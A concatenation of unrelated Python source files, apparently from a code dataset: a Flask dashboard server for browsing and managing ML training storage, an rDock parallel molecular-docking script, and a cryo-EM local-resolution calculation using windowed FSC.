self.assertEqual(ChildMyContext.current(), ctx)
self.assertEqual(MyContext.current(), ctx)
|
server.py
|
# -*- coding: utf-8 -*-
import contextlib
import copy
import hashlib
import json
import logging
import os
import re
import sys
import threading
import time
from logging import getLogger
from stat import S_ISDIR
from subprocess import CalledProcessError
import six
from flask import Blueprint, Flask, render_template, current_app, request
from flask.helpers import safe_join
from gevent.pywsgi import WSGIServer
from pygments import highlight
from pygments.formatters.html import HtmlFormatter
from pygments.lexers import get_lexer_by_name
from werkzeug.exceptions import NotFound, BadRequest
from madoka.utils import TrainStorage
from .snapshot import (TrainStorageSnapshot, TrainStorageSnapshotDiff,
TrainStorageScanner)
__all__ = ['MadokaBoardServer']
class _SnapshotCollector(object):
"""Background thread to collect training storage snapshots.
Parameters
----------
storage_root : dict[str, str]
Path of the training storage, or mappings from URL prefix to
paths of training storage.
scan_interval : int
Number of seconds between two successive scans of training storage.
"""
def __init__(self, storage_root, scan_interval):
self.storage_root = storage_root
self.scan_interval = scan_interval
self.scanners = {
k: TrainStorageScanner(v)
for k, v in six.iteritems(storage_root)
}
self.snapshot = None # type: TrainStorageSnapshot
# the background watcher
self._watching = False
self._watcher = None # type: threading.Thread
self._start_sem = None # type: threading.Semaphore
self._sleep_sem = None # type: threading.Semaphore
# initialize the snapshot for the first time
self.collect()
def collect(self):
"""Collect the snapshot and difference.
Returns
-------
TrainStorageSnapshotDiff
The difference between old and new snapshots.
"""
storage_dirs = []
for prefix, scanner in six.iteritems(self.scanners):
for s in scanner.scan():
s = copy.copy(s)
s.path = prefix + '/' + s.path
storage_dirs.append(s)
snapshot = TrainStorageSnapshot(storage_dirs)
if self.snapshot is not None:
snapshot_diff = snapshot.compute_diff(self.snapshot)
else:
snapshot_diff = None
self.snapshot = snapshot
return snapshot_diff
def wakeup_watcher(self):
"""Wake up the background thread immediately."""
if self._watching:
self._sleep_sem.release()
def start_watcher(self):
"""Start the background thread to watch training storage."""
def watch():
self._start_sem.release()
while self._watching:
try:
start_time = time.time()
diff = self.collect()
stop_time = time.time()
seconds = stop_time - start_time
getLogger(__name__).info(
'Collected snapshot in %.2f seconds, %s update(s).',
seconds, len(diff)
)
if getLogger(__name__).isEnabledFor(logging.DEBUG):
getLogger(__name__).debug('%s', diff)
except Exception:
getLogger(__name__).warning(
'Failed to collect snapshot.', exc_info=1)
self._sleep_sem.acquire(timeout=self.scan_interval)
self._watching = True
self._start_sem = threading.Semaphore(0)
self._sleep_sem = threading.Semaphore(0)
self._watcher = threading.Thread(target=watch, daemon=True)
self._watcher.start()
# wait for the thread to actually startup.
self._start_sem.acquire()
def stop_watcher(self):
"""Stop the background watcher."""
if self._watching:
self._watching = False
self._sleep_sem.release()
def json_response(method):
"""Decorator to make json response."""
@six.wraps(method)
def inner(*args, **kwargs):
return (
json.dumps(method(*args, **kwargs)),
200,
{'Content-Type': 'application/json'}
)
return inner
_STORAGE_META_FILES = [
TrainStorage._LATEST_FN, TrainStorage._MKDIR_LOCK_FN,
TrainStorage._VERSION_FN, TrainStorage._VERSION_LOCK_FN,
]
def _chown_to_parent(parent, check_list=None, ignore_errors=False):
"""
Set the owner of all storage directories and tags to that of the
parent directory.
Parameters
----------
parent : str
The parent directory of storage and tags.
check_list : collections.Iterable[str]
If specified, will only check these entries under the parent.
If not, will check all entries recursively.
ignore_errors : bool
Whether or not to ignore errors of chown?
"""
p_st = os.stat(parent)
# function to check whether or not a given path should be chown
def should_chown(file, st=None):
if st is None:
st = os.stat(file)
if st.st_uid != p_st.st_uid or st.st_gid != p_st.st_gid:
return True
# gather the entity list which should be chown
if check_list is None:
def gather_list(path, dst):
for f in os.listdir(path):
f_path = os.path.join(path, f)
f_st = os.stat(f_path)
if should_chown(f_path, f_st):
dst.append(f_path)
if S_ISDIR(f_st.st_mode):
gather_list(f_path, dst)
return dst
else:
def gather_list(path, dst):
for f in check_list:
f_path = os.path.join(path, f)
if should_chown(f_path):
dst.append(f_path)
return dst
try:
file_list = gather_list(parent, [])
# chown the entities
for file in file_list:
try:
os.chown(file, p_st.st_uid, p_st.st_gid)
except Exception:
if not ignore_errors:
raise
getLogger(__name__).warning(
'Failed to change owner of %r to %s:%s.',
file, p_st.st_uid, p_st.st_gid, exc_info=1
)
except Exception:
if not ignore_errors:
raise
getLogger(__name__).warning(
'Failed to gather entities under %r.', parent, exc_info=1)
def _make_report(parent, name, exp_id, fix_permissions=False):
# actually generate the report.
with TrainStorage.open(
parent, name, require_checkpoints=False) as store:
report = store.load_report()
store.save_report(report, exp_id=exp_id)
# fix the permissions
if fix_permissions:
report_dir = TrainStorage._REPORT_DIR
_chown_to_parent(
parent,
_STORAGE_META_FILES + [report_dir],
ignore_errors=True
)
_chown_to_parent(
os.path.join(parent, name, report_dir),
ignore_errors=True
)
class _StorageBlueprint(Blueprint):
"""Flask blueprint to serve training reports under specified root.
Parameters
----------
name : str
Name of this blue print.
root_path : str
Root path of the training storage.
"""
def __init__(self, name, root_path, url_prefix):
super(_StorageBlueprint, self).__init__(
name, __name__, url_prefix=url_prefix
)
self.root_path = os.path.realpath(root_path)
# add url routes
self.add_url_rule('/<path:path>/_navigation.html',
view_func=self.navigation)
self.add_url_rule('/<path:path>/_main.py',
view_func=self.main_script)
self.add_url_rule('/<path:path>/_api',
view_func=self.storage_api,
methods=['POST'])
# auto index generator
from flask_autoindex import AutoIndexBlueprint
self._index_generator = AutoIndexBlueprint(
self,
browse_root=self.root_path
)
def get_storage_root(self, path):
"""Get storage root for given virtual path.
Parameters
----------
path : str
The virtual path of the storage, relative to `self.root_path`.
Returns
-------
str
The file system path of the storage.
Raises
------
NotFound
If the specified storage does not exist.
"""
# get the storage root path
path = [p for p in re.sub(r'(/|\\)+', '/', path).split('/')
if p not in ('', '.', '..')]
root = os.path.join(self.root_path, *path)
# check whether or not it looks like a storage root directory
if not os.path.isdir(root):
raise NotFound()
summary_dir = os.path.join(root, TrainStorage._SUMMARY_DIR)
report_dir = os.path.join(root, TrainStorage._REPORT_DIR)
logging_file = os.path.join(root, TrainStorage._LOGGING_FN)
candidates = (summary_dir, report_dir, logging_file)
if not any(os.path.exists(p) for p in candidates):
raise NotFound()
return root
def navigation(self, path):
self.get_storage_root(path) # ensure the storage exists
exp_id = path.rsplit('/', 1)[-1]
return render_template('navigation.html', exp_id=exp_id)
def main_script(self, path):
# ensure the storage exists
root = self.get_storage_root(path)
# read the main script
script_file = os.path.join(root, 'main.py')
if not os.path.exists(script_file):
raise NotFound()
with open(script_file, 'rb') as f:
code = f.read()
# highlight the code by pygments
lexer = get_lexer_by_name("python", stripall=True)
formatter = HtmlFormatter(linenos=True, cssclass="codehilite")
source = highlight(code, lexer, formatter)
return render_template(
'highlight.html', source=source, filename='main.py')
def _storage_delete(self, path, parent, name):
try:
TrainStorage.delete(parent, name)
if current_app.server.chown_to_parent:
_chown_to_parent(
parent, _STORAGE_META_FILES, ignore_errors=True)
current_app.server.collector.wakeup_watcher()
return {'error': 0, 'message': ''}
except Exception:
msg = 'Failed to delete storage %r.' % path
getLogger(__name__).warning(msg, exc_info=1)
return {'error': 1, 'message': msg}
def _storage_change_tags(self, path, parent, name, tags, op):
try:
if op == 'remove_tags':
TrainStorage.remove_tags(parent, name, tags)
elif op == 'add_tags':
TrainStorage.add_tags(parent, name, tags)
if current_app.server.chown_to_parent:
_chown_to_parent(
parent, _STORAGE_META_FILES + tags, ignore_errors=True)
current_app.server.collector.wakeup_watcher()
return {'error': 0, 'message': ''}
except ValueError as ex:
msg = str(ex)
return {'error': 1, 'message': msg}
except Exception:
msg = 'Failed to %s tags %r for storage %r.' % (op, tags, path)
getLogger(__name__).warning(msg, exc_info=1)
return {'error': 1, 'message': msg}
def _storage_make_report(self, path, parent, name):
fix_permissions = current_app.server.chown_to_parent
if self.url_prefix.endswith('/'):
exp_id = self.url_prefix + path
else:
exp_id = self.url_prefix + '/' + path
# spawn the python process to make the report
import gevent.subprocess
try:
env = copy.copy(os.environ)
env['PYTHONPATH'] = '%s:%s' % (
os.path.abspath(
os.path.join(
os.path.dirname(__file__),
'../..'
)
),
env.get('PYTHONPATH', '')
)
_ = gevent.subprocess.check_output(
[
sys.executable,
'-c',
'# -*- encoding: utf-8 -*-\n'
'from madoka.board.server import _make_report\n'
'_make_report(%r, %r, %r, %r)' %
(parent, name, exp_id, fix_permissions)
],
stderr=gevent.subprocess.STDOUT
)
return {'error': 0, 'message': ''}
except CalledProcessError as ex:
msg = (
'Failed to generate report for storage %r: '
'exit code is %d.' % (path, ex.returncode)
)
getLogger(__name__).warning(msg)
getLogger(__name__).info(ex.output.decode('utf-8'))
return {'error': 1, 'message': msg}
@json_response
def storage_api(self, path):
# parse the request body
action = request.get_json(force=True)
if not isinstance(action, dict):
raise BadRequest()
op = action['op']
if op not in ('delete', 'make_report', 'add_tags', 'remove_tags'):
raise BadRequest()
# ensure the storage exists
root = self.get_storage_root(path)
parent, name = os.path.split(root.rstrip('/'))
if not parent:
msg = 'Parent directory of storage %r is empty!' % path
return {'error': 1, 'message': msg}
if op == 'delete':
# dispatch the delete action
ret = self._storage_delete(path, parent, name)
elif op == 'make_report':
# dispatch the make report action
ret = self._storage_make_report(path, parent, name)
else:
# parse tags
if 'tags' not in action:
raise BadRequest()
tags = action['tags']
if not isinstance(tags, list) or \
not all(isinstance(s, str) for s in tags):
raise BadRequest()
# dispatch the tags action
ret = self._storage_change_tags(path, parent, name, tags, op)
return ret
class _RootApp(Flask):
"""Flask application of Madoka Board.
Parameters
----------
server : MadokaBoardServer
The Madoka Board application server.
"""
def __init__(self, server):
super(_RootApp, self).__init__(__name__, static_url_path='/_static')
# memorize the server
self.server = server
# add url routes
self.add_url_rule('/', view_func=self.index)
self.add_url_rule('/_settings', view_func=self.settings)
self.add_url_rule('/_snapshot', view_func=self.snapshot)
# cache of static file hashes
self._file_hash_cache = {}
def index(self):
return render_template('index.html')
@json_response
def settings(self):
return {
'scan_interval': self.server.scan_interval
}
@json_response
def snapshot(self):
return [
(s.path, s.tags, s.status, s.modify_time)
for s in self.server.collector.snapshot
]
def inject_url_defaults(self, endpoint, values):
"""
Injects an "h" parameter on the URLs of static files that contains a
hash of the file. This allows the use of aggressive cache settings on
static files, while ensuring that content changes are reflected
immediately due to the changed URLs. Hashes are cached in-memory
and only checked for updates when the file mtime changes.
Source: https://gist.github.com/mfenniak/2978805
"""
super(_RootApp, self).inject_url_defaults(endpoint, values)
if endpoint == "static" and "filename" in values:
filepath = safe_join(self.static_folder, values["filename"])
if os.path.isfile(filepath):
cache = self._file_hash_cache.get(filepath)
mtime = os.path.getmtime(filepath)
if cache != None:
cached_mtime, cached_hash = cache
if cached_mtime == mtime:
values["h"] = cached_hash
return
h = hashlib.md5()
with contextlib.closing(open(filepath, "rb")) as f:
h.update(f.read())
h = h.hexdigest()
self._file_hash_cache[filepath] = (mtime, h)
values["h"] = h
class MadokaBoardServer(object):
"""Madoka Board server.
Parameters
----------
storage_root : str | dict[str, str]
Path of the training storage, or mappings from URL prefix to
paths of training storage.
scan_interval : int
Number of seconds between two successive scans of training storage.
Default is 120.
port : int
Bind port number. Default is 8080.
interface : str
Bind interface.
If not specified, will bind to all interfaces.
chown_to_parent : bool
Whether or not to set the owner of newly created tags to
that of the parent directory?
debug : bool
Whether or not to turn on Flask debugging features?
Default is False.
"""
def __init__(self, storage_root, scan_interval=120, port=8080,
interface=None, chown_to_parent=False, debug=False):
# memorize arguments
if not isinstance(storage_root, dict):
storage_root = {'': os.path.realpath(storage_root)}
else:
storage_root = {
k.rstrip('/'): os.path.realpath(v)
for k, v in six.iteritems(storage_root)
}
self.storage_root = storage_root
self.scan_interval = scan_interval
self.port = port
self.interface = interface or ''
self.chown_to_parent = chown_to_parent
# create the snapshot collector
self.collector = _SnapshotCollector(storage_root, scan_interval)
# construct Flask application
self.app = _RootApp(self)
for k, v in six.iteritems(storage_root):
bp_name = 'storage_bp_%s' % v.strip('/').replace('/', '_')
self.app.register_blueprint(
_StorageBlueprint(bp_name, v, url_prefix=k)
)
# turn on debug features
if debug:
self.app.config['DEBUG'] = True
self.app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
# make the Flask application aware of template changes
self.app.config['TEMPLATES_AUTO_RELOAD'] = True
# initialize the server
self.http = WSGIServer((self.interface, self.port), self.app)
def run(self):
"""Run the server in foreground."""
if self.interface:
endpoint = '%s:%s' % (self.interface, self.port)
else:
endpoint = str(self.port)
getLogger(__name__).info(
'Madoka Board server listening at %s', endpoint)
self.collector.start_watcher()
self.http.serve_forever()
|
rdock_test_MP.py
|
from rdkit import Chem
from rdkit.Chem import AllChem
import subprocess
#import threading
from multiprocessing import Process
import os
import shutil
import time
def docking_calculation(cmd):
proc = subprocess.call( cmd , shell=True)
print('end in thread')
#----parameter & preparation
def rdock_score(compound, score_type, target_dir, docking_num = 10):
# check RBT_ROOT setting:
RBT_ROOT=os.environ.get('RBT_ROOT')
if os.getenv('RBT_ROOT') == None:
print("The RBT_ROOT has not defined, please set it before use it!")
exit(0)
else:
RBT_ROOT=os.getenv('RBT_ROOT')
print('RBT_ROOT is: ', RBT_ROOT)
input_smiles = str(compound)
num_cpus = docking_num # total number of docking
score_name = score_type # SCORE or SCORE.INTER ## edit by Biao Ma at 20190920
target_dir = target_dir
sdf_file = 'tmp_comp.sdf'
docking_result_file = 'rdock_out_'
min_score = 10**10
min_score_inter = 10**10
min_score_id = 0
min_score_inter_id = 0
path=os.getcwd()
os.chdir(path)
#----Translation from SMILES to sdf
fw = Chem.SDWriter(sdf_file)
m1 = Chem.MolFromSmiles(input_smiles)
try:
if m1!= None:
m = Chem.AddHs(m1)
cid = AllChem.EmbedMolecule(m)
#fw.write(m)
opt = AllChem.UFFOptimizeMolecule(m,maxIters=200)
print('3D structure optimization by AllChem.UFFOptimizeMolecule(m,maxIters=200) :', opt)
fw.write(m)
fw.close()
#----rdock calculation
#cmd = '/home/terayama/rdock/fiexed_side_chain/build/exe/rbdock -r cavity.prm -p /home/terayama/rdock/fiexed_side_chain/data/scripts/dock.prm -i ' + sdf_file + ' -o ' + docking_result_file + ' -T 0 -n' + str(num_docking_unit)
#proc = subprocess.call( cmd , shell=True)
#proc = subprocess.popen(cmd, shell=True)
#r1 = p1.wait()
#print('r1', p1)
start_time = time.time()
processes = []
for i in range(num_cpus):
#cmd = '/home/terayama/rdock/fiexed_side_chain/build/exe/rbdock -r cavity.prm -p /home/terayama/rdock/fiexed_side_chain/data/scripts/dock.prm -i ' + sdf_file + ' -o ' + docking_result_file + str(i) + ' -T 0 -s '+str(i)+' -n 1'
#cmd = 'rbdock -r cavity.prm -p /home/mki/SideEffectPrediction/08_rDock/prm/dock.prm -i ' + sdf_file + ' -o ' + docking_result_file + str(i) + ' -T 0 -s '+str(i)+' -n 1'
cmd = RBT_ROOT + '/bin/rbdock -allH -r '+ target_dir + '/cavity.prm -p '+ RBT_ROOT + '/data/scripts/dock.prm -i ' + sdf_file + ' -o ' + docking_result_file + str(i) + ' -T 0 -s '+str(i)+' -n 1'
print('cmd', cmd)
#t = threading.Thread(target=docking_calculation, args=(cmd,))
#threads.append(t)
#t.start()
t = Process(target=docking_calculation, args=(cmd,))
processes.append(t)
for p in processes:
p.start()
for p in processes:
p.join()
print('end')
end_time = time.time()
#print('time used:%s' % end_time - start_time)
print('docking time_used', end_time - start_time)
for i in range(num_cpus):
#----find the minimum score of rdock from multiple docking results
f = open(docking_result_file+str(i)+'.sd')
lines = f.readlines()
f.close()
line_count = 0
score_line = -1
score_inter_line = -1
for line in lines:
v_list = line.split()
if line_count == score_line:
print(v_list[0])
if float(v_list[0]) < min_score:
min_score = float(v_list[0])
min_score_id = i
if line_count == score_inter_line:
print(v_list[0])
if float(v_list[0]) < min_score_inter:
min_score_inter = float(v_list[0])
min_score_inter_id = i
if len(v_list) <= 1:
line_count += 1
continue
if v_list[1] == '<SCORE>':
score_line = line_count + 1
if v_list[1] == '<SCORE.INTER>':
score_inter_line = line_count + 1
line_count += 1
print('minimum rdock score', min_score, 'score_inter', min_score_inter)
except:
print('error')
min_score=10**10
min_score_inter = 10**10
os.chdir(path)
#os.mkdir('out') # creat the directory for rdock best output for new compound.
best_docking_id = min_score_id if score_type == 'SCORE' else min_score_inter_id
return [min_score, min_score_inter, best_docking_id]
#rdock_score('Oc1ccc(NC(=O)C)cc1', 2, '<SCORE.INTER>', docking_num = 1, protein_target = 'kith')
|
localResolutions.py
|
import numpy as np
import functools
import multiprocessing
import math
from FSCUtil import FSCutil
from confidenceMapUtil import FDRutil
from scipy.interpolate import RegularGridInterpolator
#------------------------------------------------------------
def localResolutions(halfMap1, halfMap2, boxSize, stepSize, cutoff, apix, numAsymUnits, mask, maskPermutation):
# ********************************************
# ****** calculate local resolutions by ******
# ********** local FSC-thresholding **********
# ********************************************
print("Starting calculations of local resolutions ...");
sizeMap = halfMap1.shape;
locRes = np.zeros((len(range(boxSize, boxSize + sizeMap[0], stepSize)),
len(range(boxSize, boxSize + sizeMap[1], stepSize)),
len(range(boxSize, boxSize + sizeMap[2], stepSize))));
# pad the volumes
paddedHalfMap1 = np.zeros((sizeMap[0] + 2 * boxSize, sizeMap[1] + 2 * boxSize, sizeMap[2] + 2 * boxSize));
paddedHalfMap2 = np.zeros((sizeMap[0] + 2 * boxSize, sizeMap[1] + 2 * boxSize, sizeMap[2] + 2 * boxSize));
paddedMask = np.zeros((sizeMap[0] + 2 * boxSize, sizeMap[1] + 2 * boxSize, sizeMap[2] + 2 * boxSize));
paddedMaskPermutation = np.zeros((sizeMap[0] + 2 * boxSize, sizeMap[1] + 2 * boxSize, sizeMap[2] + 2 * boxSize));
paddedHalfMap1[boxSize: boxSize + sizeMap[0], boxSize: boxSize + sizeMap[1],
boxSize: boxSize + sizeMap[2]] = halfMap1;
paddedHalfMap2[boxSize: boxSize + sizeMap[0], boxSize: boxSize + sizeMap[1],
boxSize: boxSize + sizeMap[2]] = halfMap2;
paddedMask[boxSize: boxSize + sizeMap[0], boxSize: boxSize + sizeMap[1], boxSize: boxSize + sizeMap[2]] = mask;
paddedMaskPermutation[boxSize: boxSize + sizeMap[0], boxSize: boxSize + sizeMap[1], boxSize: boxSize + sizeMap[2]] = maskPermutation;
halfBoxSize = int(boxSize / 2.0);
# make Hann window
hannWindow = FDRutil.makeHannWindow(np.zeros((boxSize, boxSize, boxSize)));
numCalculations = len(range(boxSize, boxSize + sizeMap[0], stepSize)) * len(
range(boxSize, boxSize + sizeMap[1], stepSize)) * len(range(boxSize, boxSize + sizeMap[0], stepSize));
print("Total number of calculations: " + repr(numCalculations));
# ****************************************************
# ********* get initial permuted CorCoeffs ***********
# ****************************************************
print("Do initial permuations ...");
for i in range(10):
xInd = np.random.randint(boxSize, sizeMap[0] + boxSize);
yInd = np.random.randint(boxSize, sizeMap[1] + boxSize);
zInd = np.random.randint(boxSize, sizeMap[2] + boxSize);
#xInd = np.random.randint(sizeMap[0]/2 - sizeMap[0]/8 + boxSize, sizeMap[0]/2 + sizeMap[0]/8 + boxSize);
#yInd = np.random.randint(sizeMap[1]/2 - sizeMap[1]/8 + boxSize, sizeMap[1]/2 + sizeMap[1]/8 + boxSize);
#zInd = np.random.randint(sizeMap[2]/2 - sizeMap[2]/8 + boxSize, sizeMap[2]/2 + sizeMap[2]/8 + boxSize);
#generate new locations until one is found in the mask
while ((paddedMaskPermutation[xInd, yInd, zInd] < 0.5)):
xInd = np.random.randint(boxSize, sizeMap[0] + boxSize);
yInd = np.random.randint(boxSize, sizeMap[1] + boxSize);
zInd = np.random.randint(boxSize, sizeMap[2] + boxSize);
#xInd = np.random.randint(sizeMap[0] / 2 - sizeMap[0] / 8 + boxSize,
# sizeMap[0] / 2 + sizeMap[0] / 8 + boxSize);
#yInd = np.random.randint(sizeMap[1] / 2 - sizeMap[1] / 8 + boxSize,
# sizeMap[1] / 2 + sizeMap[1] / 8 + boxSize);
#zInd = np.random.randint(sizeMap[2] / 2 - sizeMap[2] / 8 + boxSize,
# sizeMap[2] / 2 + sizeMap[2] / 8 + boxSize);
#get windowed parts
windowHalfmap1 = paddedHalfMap1[xInd - halfBoxSize: xInd - halfBoxSize + boxSize,
yInd - halfBoxSize: yInd - halfBoxSize + boxSize,
zInd - halfBoxSize: zInd - halfBoxSize + boxSize];
windowHalfmap2 = paddedHalfMap2[xInd - halfBoxSize: xInd - halfBoxSize + boxSize,
yInd - halfBoxSize: yInd - halfBoxSize + boxSize,
zInd - halfBoxSize: zInd - halfBoxSize + boxSize];
# apply hann window
windowHalfmap1 = windowHalfmap1 * hannWindow;
windowHalfmap2 = windowHalfmap2 * hannWindow;
res, _, _, _, _, _, tmpPermutedCorCoeffs = FSCutil.FSC(windowHalfmap1, windowHalfmap2, None, apix, cutoff, numAsymUnits,
True, False, None, False);
if i == 0:
# initialize the array of correlation coefficients
permutedCorCoeffs = tmpPermutedCorCoeffs;
else:
# append the correlation coefficients
for resInd in range(len(tmpPermutedCorCoeffs)):
permutedCorCoeffs[resInd] = np.append(permutedCorCoeffs[resInd], tmpPermutedCorCoeffs[resInd]);
# ****************************************************
# ********* calculate the local resolutions **********
# ****************************************************
print("Do local FSC calculations ...");
# generate partial function to loop over the whole map
partialLoopOverMap = functools.partial(loopOverMap, paddedMask=paddedMask, paddedHalfMap1=paddedHalfMap1,
paddedHalfMap2=paddedHalfMap2, boxSize=boxSize, sizeMap=sizeMap,
stepSize=stepSize, halfBoxSize=halfBoxSize,
hannWindow=hannWindow, apix=apix, cutoff=cutoff, numAsymUnits=numAsymUnits,
permutedCorCoeffs=permutedCorCoeffs);
#parallelized local resolutions
numCores = min(multiprocessing.cpu_count(),4);
print("Using {:d} cores. This might take a few minutes ...".format(numCores));
iIterable = range(boxSize, boxSize + sizeMap[0], stepSize);
#initialize parallel processes
lenInt = int(math.ceil(len(iIterable)/float(numCores)));
queue = multiprocessing.Queue();
#start process for each core and run in parallel
for i in range(numCores):
#split the iterable
startInd = (i*lenInt);
endInd = (i+1)*lenInt;
if i == (numCores-1):
seq = range(iIterable[startInd], iIterable[len(iIterable)-1]+stepSize, stepSize);
else:
seq = range(iIterable[startInd], iIterable[endInd], stepSize);
#start the respective process
proc = multiprocessing.Process(target=partialLoopOverMap, args=(seq, queue,));
proc.start();
#addition of indiviual local resolution maps to produce the final one
for i in range(numCores):
locRes = locRes + queue.get();
# *************************************
# ********** do interpolation *********
# *************************************
#locRes[locRes==0] = 2.2;
print("Interpolating local Resolutions ...");
x = np.linspace(1, 10, locRes.shape[0]);
y = np.linspace(1, 10, locRes.shape[1]);
z = np.linspace(1, 10, locRes.shape[2]);
myInterpolatingFunction = RegularGridInterpolator((x, y, z), locRes, method='linear')
xNew = np.linspace(1, 10, sizeMap[0]);
yNew = np.linspace(1, 10, sizeMap[1]);
zNew = np.linspace(1, 10, sizeMap[2]);
xInd, yInd, zInd = np.meshgrid(xNew, yNew, zNew, indexing='ij', sparse=True);
localRes = myInterpolatingFunction((xInd, yInd, zInd));
localRes[mask <= 0.01] = 0.0;
return localRes;
#-----------------------------------------------------------------
def loopOverMap(iSeq, queue, paddedMask, paddedHalfMap1, paddedHalfMap2, boxSize, sizeMap,
stepSize, halfBoxSize, hannWindow, apix, cutoff, numAsymUnits, permutedCorCoeffs):
# ********************************************
# ******* iterate over the map and calc ******
# ************ local resolutions *************
# ********************************************
locRes = np.zeros((len(range(boxSize, boxSize + sizeMap[0], stepSize)),
len(range(boxSize, boxSize + sizeMap[1], stepSize)),
len(range(boxSize, boxSize + sizeMap[2], stepSize))));
for i in iSeq:
iInd = int((i-boxSize)/stepSize);
jInd = 0;
for j in range(boxSize, boxSize + sizeMap[1], stepSize):
kInd = 0;
for k in range(boxSize, boxSize + sizeMap[2], stepSize):
if paddedMask[i, j, k] > 0.99:
window_halfmap1 = paddedHalfMap1[i - halfBoxSize: i - halfBoxSize + boxSize,
j - halfBoxSize: j - halfBoxSize + boxSize,
k - halfBoxSize: k - halfBoxSize + boxSize];
window_halfmap2 = paddedHalfMap2[i - halfBoxSize: i - halfBoxSize + boxSize,
j - halfBoxSize: j - halfBoxSize + boxSize,
k - halfBoxSize: k - halfBoxSize + boxSize];
# apply hann window
window_halfmap1 = window_halfmap1 * hannWindow;
window_halfmap2 = window_halfmap2 * hannWindow;
_, _, _, _, _, tmpRes, _ = FSCutil.FSC(window_halfmap1, window_halfmap2, None, apix, cutoff,
numAsymUnits,
True, False, permutedCorCoeffs, False);
locRes[iInd, jInd, kInd] = tmpRes;
else:
locRes[iInd, jInd, kInd] = 0.0;
kInd = kInd + 1;
jInd = jInd + 1;
#push back the local resolution map to the list
queue.put(locRes);
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.